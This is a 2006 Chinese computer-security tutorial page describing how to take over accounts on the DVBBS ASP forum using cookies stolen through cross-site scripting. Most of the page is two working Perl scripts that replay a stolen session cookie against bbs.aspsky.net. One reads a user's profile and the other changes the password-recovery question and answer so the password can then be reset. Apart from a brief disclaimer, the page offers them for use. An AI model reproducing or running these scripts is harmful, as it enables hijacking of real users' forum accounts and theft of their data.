动网先锋,突破动网先锋asp论坛的密码加密限制

突破动网先锋asp论坛的密码加密限制 - 电脑安全 - 电脑教程网

突破动网先锋asp论坛的密码加密限制

日期:2006-10-19   荐:
  对动网先锋asp论坛的安全性分析----跨站脚本攻击动网论坛密码和提示问题答案是md5加密过的,拿到cookie也没什么价值,我们可以换一种思路,拿到cookie后,通过发送一个请求取的用户的相关资料,然后再发送个请求修改用户提示问题以及答案。声明:以下的两个脚本尽供参考,请勿用作非法用途,否则一切后果自负!hiallone是我在动网论坛注册的用来测试的用户,大家可以看看演示效果http://enter.3322.net/cgi-bin/dongw.cgihttp://enter.3322.net/cgi-bin/dongw1.cgi#!/usr/bin/perl#取得用户资料# http://enter.3322.net/cgi-bin/dongw.cgiuse Socket;$host = "bbs.aspsky.net";$port = 80;$str = "";$len =length($str);$req = "POST /MYMODIFY.ASP?name=hiallone HTTP/1.1\r\n"."Host: $host\r\n"."Accept: */*\r\n"."Cookie: aspsky=password=965eb72c92a549dd&usercookies=0&username=hiallone&userclass=论坛游民&upNum=1;\r\n"."Content-Type: application/x-www-form-urlencoded\r\n"."Content-Length: $len\n\n"."$str\n\n";@re =sendraw($req);print "Content-type: text/html\n\n";print "@re";sub sendraw {my ($req) = @_;my $target;$target = inet_aton($host) || die("inet_aton problems");socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n");if(connect(S,pack "SnA4x8",2,$port,$target)){select(S);$| = 1;print $req;my @res = <S>;select(STDOUT);close(S);return @res;}else {die("Can't connect...\n");}}------------------------------------------------#!/usr/bin/perl#修改提示问题以及答案,在这里我们可以修改quesion=whoami21&answer=superdao#那么你可以去改他的密码了,呵呵!#http://enter.3322.net/cgi-bin/dongw1.cgiuse Socket;$host = "bbs.aspsky.net";$port = 80;$str = 'Sex=1&psw=965eb72c92a549dd&quesion=whoami21&answer=superdao&oldanswer=076d0cca420653d4&Email=o00o@800e.net&birthyear=&birthmonth=&birthday=&face=Pic/Image1.gif&myface=Pic/Image1.gif&width=22&height=22&URL=&groupname=无门无派&OICQ=&ICQ=&msn=&showRe=1&Signature=&usercookies=0&Submit=更 新';$len =length($str);$req = "POST /mymodify.asp?action=updat&username=hiallone HTTP/1.1\r\n"."Host: $host\r\n"."Accept-Language: zh-cn\r\n"."Content-Type: application/x-www-form-urlencoded\r\n"."Accept-Encoding: gzip, deflate\r\n"."User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)\r\n"."Cookie: aspsky=upNum=1&password=965eb72c92a549dd&userclass=论坛游民&username=hiallone&usercookies=0\r\n"."Content-Length: $len\r\n"."Connection: Keep-Alive\n\n"."$str\n\n";@re =sendraw($req);print "Content-type: text/html\n\n";print "@re";sub sendraw {my ($req) = @_;my $target;$target = inet_aton($host) || die("inet_aton problems");socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n");if(connect(S,pack "SnA4x8",2,$port,$target)){select(S);$| = 1;print $req;my @res = <S>;select(STDOUT);close(S);return @res;}else {die("Can't connect...\n");}}
标签: